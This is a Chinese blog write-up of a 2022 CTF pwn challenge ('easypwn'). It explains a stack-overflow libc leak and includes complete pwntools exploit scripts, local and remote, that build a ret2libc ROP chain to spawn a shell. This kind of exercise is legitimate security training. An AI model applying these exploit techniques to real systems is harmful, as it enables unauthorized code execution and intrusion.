2022赣育杯easypwn

已于 2022-11-15 22:47:26 修改
阅读量213 收藏
点赞数
分类专栏: PWN CTF_pwn 文章标签: 网络安全
于 2022-11-14 22:10:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingan6/article/details/127856291
版权
这篇博客介绍了一个pwn题的解决方案,通过栈溢出泄露puts函数地址,然后计算libc中的system和/bin/sh地址,最终利用返回到main的技巧执行shell。本地和远程exp的详细步骤分别给出。
摘要由CSDN通过智能技术生成

pwn的签到题

64位

9fc02e204ec846b790710e2c9daf746a.png

这里buf有个栈溢出,但是没有后门,没有system,没有/bin/sh

很明显的libc泄露题

 程序运行一开始就把puts地址泄露出来了

1ac7dc6f19c34a97bdbd24db8beeb8c1.png

 puts

0x7fd1bbb356a0

那么思路就很明显了,用给的puts地址直接计算偏移即可,算出system和/bin/sh

有个问题就是如果要先打本地就要重新泄露puts地址,这个地方是个大坑,libc也不能用给的,需要用本地的libc

打本地的exp

from pwn import *

p=process('/home/pwn/Desktop/que/easypwn')
elf=ELF('/home/pwn/Desktop/que/easypwn')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')


puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_address=0x401186

system_libc=libc.symbols['system']
bin_sh_libc=libc.search('/bin/sh').next()
pop_rdi=0x0000000000401273

puts_libc=libc.symbols['puts']

p.recvuntil("\n")

payload="a"*0x100+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_address)
p.sendline(payload)

p.recvuntil("\n")
puts_addr=u64(p.recv(6).ljust(8,'\0'))
print(hex(puts_addr))

base_address=puts_addr-puts_libc
system_address=base_address+system_libc
bin_address=base_address+bin_sh_libc

ret=0x000000000040101a

print(hex(base_address))
print(hex(system_address))
print(hex(bin_address))

payload2="a"*0x100+'a'*8+p64(ret)+p64(pop_rdi)+p64(bin_address)+p64(system_address)
p.sendline(payload2)
p.interactive()

16da666d35c64567968b0675c81f04bb.png

 

远程exp

#!/usr/bin/env python

# -*- coding: utf-8 -*-



from pwn import *

p = remote('192.168.xx.xx', xxxx)#这里注意自己改哦

elf=ELF('/home/pwn/Desktop/que/easypwn')

libc=ELF('/home/pwn/Desktop/que/libc.so.6')#题目给的libc



system_libc=libc.symbols['system']

bin_sh_libc=libc.search('/bin/sh').next()



puts_libc=libc.symbols['puts']

puts_addr=0x7f0c91b1f6a0



base_address=puts_addr-puts_libc

system_address=base_address+system_libc

bin_address=base_address+bin_sh_libc



print(hex(base_address))

print(hex(system_address))

print(hex(bin_address))



ret=0x000000000040101a

pop_rdi=0x0000000000401273



payload = 'a'*0x100 +'a'*8+p64(ret)+p64(pop_rdi)+p64(bin_address)+p64(system_address)

p.sendline(payload)

p.interactive()

 

 

 

qingan6
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
“百度杯”CTF比赛 十二月场easypwn
红凳子的博客
04-04 656
“百度杯”CTF比赛 十二月场easypwn前言一、程序分析二、漏洞利用exploit 前言 在这篇文章中将学习到泄露canary、ret2scu和ret2syscall 一、程序分析 从中可以看出该程序为64位动态链接的ELF文件,开启了canary保护,需要想办法绕过。 绕过canary的方法分为两种,一种为直接泄露canary的值,另一种为覆盖canary的值。 这里选择泄露canary的值,可以看出canary的位置在[rbp-8h]处,接着想办法泄露出[rbp-8h]处数据。 从源码中可以
攻防世界-PWN进阶区-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 1952
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT表 main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲区大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
WICCTF-2021-easypwn
05-12
2021津门杯ctf的第一道pwn题。
easypwn
zip471642048的博客
12-01 280
esaypwn
HNCTF2024-easypwn
最新发布
sagic的博客
07-18 200
我们可以执行 exec 1>&0,也就是把标准输出重定向到标准输入,因为默认打开一个终端后,0,1,2都指向同一个位置也就是当前终端,所以这条语句相当于重启了标准输出,此时就可以执行命令并且看得到输出了。0是标准输入,1是标准输出,2是标准错误。
攻防世界easypwn
weixin_44447516的博客
08-01 532
攻防世界 EasyPwn
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3806
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
2021年津门杯ctf线上赛记录(WICCTF)
lifanxin的博客
05-12 1981
津门杯ctf线上赛概述pwn题easypwnpwnCTFM总结 概述   本篇博客记录下自己的第一次ctf比赛经历,其实不完全是第一次,之前也参加过其他比赛,但只能做个签到就走了,这次不一样了,好歹做出了一道pwn题,有一道本来是有机会的,搞错libc了,线上没拿到flag,不过线上复现了下,感觉还行。因此特写下此篇博文,记录自己的一血。???? pwn题   我个人现在只会做做pwn题,后面打算也看看web,提升一下综合实力,这里介绍下比赛中的两道pwn题,和官方wp不一样,这里是我自己的思路。 easy
unctf2019 pwn部分题解
NoOneGroup
01-08 1556
unctf2019 pwn部分题解 新博客链接 babyheap easy,不讲了 #!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * local = 1 host = '127.0.0.1' port = 10000 context.log_level = 'debug' exe = '/tmp/tmp.spk5n...
roarctf_2019_easy_pwn
maple105890的博客
01-07 196
用off by one构造的烦人的堆重叠,真的调试的我想死
【pwn】roarctf_2019_easy_pwn
Nothing
12-24 2105
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 569
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 286
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
攻防世界Easypwn-格式化字符串漏洞利用
aptx4869_li的博客
02-21 615
解题思路 基本信息查询 healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ readelf -h pwn1 ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's c
new-easy(pwn)
m0_72827793的博客
03-12 1311
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2324
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3993
攻防世界-Pwn-new-easypwn
2022年江西省赣育杯网络安全大赛学生组Web&Misc Writeup
末初的CSDN博客
10-09 6697
2022年江西省赣育杯网络安全大赛学生族Web&Misc Writeup
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值